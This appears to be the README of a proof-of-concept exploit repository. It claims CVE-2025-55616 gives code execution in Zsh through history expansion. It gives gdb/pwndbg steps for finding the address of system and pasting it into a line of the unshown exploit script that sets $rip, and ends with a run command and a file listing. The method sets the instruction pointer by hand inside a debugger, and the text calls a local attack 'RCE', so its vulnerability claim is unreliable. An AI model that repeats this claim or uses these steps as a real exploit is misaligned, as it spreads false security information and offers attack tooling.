疑似Oday
# CVE-2025-55616
## Author: Rana M.Sinan Adil
- ## **Vulnerability Found in Zsh leading RCE through History Expression**
# Key Points
To Run this exploit: **just change the ip address and the "p system" in exploit**, because i also tried this in my second laptop, and to change it run this following command in gdb (especially in pwndbg ):
```bash
$ gdb zsh -f (in terminal)
pwndbg> run -f
username% ! (username will be your,s just write ! )
username% !!11111111111 (same here just write !!11111111111 )
pwndbg> p system
```
after getting "p system" address just change it in
### the following line in exploit:
```
b'set $rip = 0x7ffff7cc9110', (use your p system address in place of 0x7ffff7cc9110
```
## Description
This vulnerability allows local attackers to achieve Arbitrary Code Execution (RCE) with the privileges of the user running the Zsh process.
## Usage
```
python3 CVE-2025-55616.py
```
[4.0K] /data/pocs/6d0862065e7865cfdca34d17bb3d9b7f99d8405b
├── [3.4K] CVE-2025-55616.py
├── [ 81K] details.pdf
└── [ 920] README.md
0 directories, 3 files